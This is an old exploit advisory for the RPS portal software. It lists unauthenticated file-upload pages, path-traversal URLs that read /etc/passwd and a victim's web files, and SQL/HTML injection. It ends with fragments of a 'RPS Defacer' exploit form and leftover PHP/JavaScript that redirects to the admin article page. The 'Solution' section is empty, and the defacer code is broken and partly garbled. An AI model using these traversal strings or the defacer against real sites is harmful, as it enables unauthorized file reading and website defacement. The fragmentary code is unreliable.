########################################################################### # Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system) # # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus@diosdelared.com # Website: www.elitemexico.org # Date: 18/07/06 # Risk: medium # Vendor Url: http://rps.rigtersir.com/ # Affected Software: RPS # Non Affected: RPS V 4 # #Info: ################################################################## #UPLOAD FILES # it allows the user to raise archives without having administration privileges # # #SQL inyección #it allows the user to insert post without having to be admin with this can make xss or #HTML injection # # #example of upload files ################################################################## # #http://www.vuln.com/[path]/adm/photos/images.php # #http://www.vuln.com/[path]//adm/down/files.php # ################################################################## #example Remote Execution ################################################################## # #http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd # #http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index # ################################################################## # #Solution: ################################################################## # # #VULNERABLE VERSIONS ################################################################## # v1.0, 2.0 3.0 # ################################################################## #Contact information #0o_zeus_o0 #zeus@diosdelared.com #www.elitemexico.org ################################################################## #greetz: lady fire,Mi beba, olimpus klan team and elitemexico # #Original Advisory: http://zeus.pccentervillaflores.com//13.txt ################################################################## SQL inyección in "Articulos" exploit RPS Defacer

RPS Defacer

0o_ZEUS_o0 OliMpusKlaN
•~ FX ~•

Direccion:
Autor:
Email:
Titulo:
Contenido: (Soporta HTML Inyection)

var pagina=\"$web/adm/add_art.php\" function redireccionar() { location.href=pagina } setTimeout (\"redireccionar()\", 0001); "; } ?>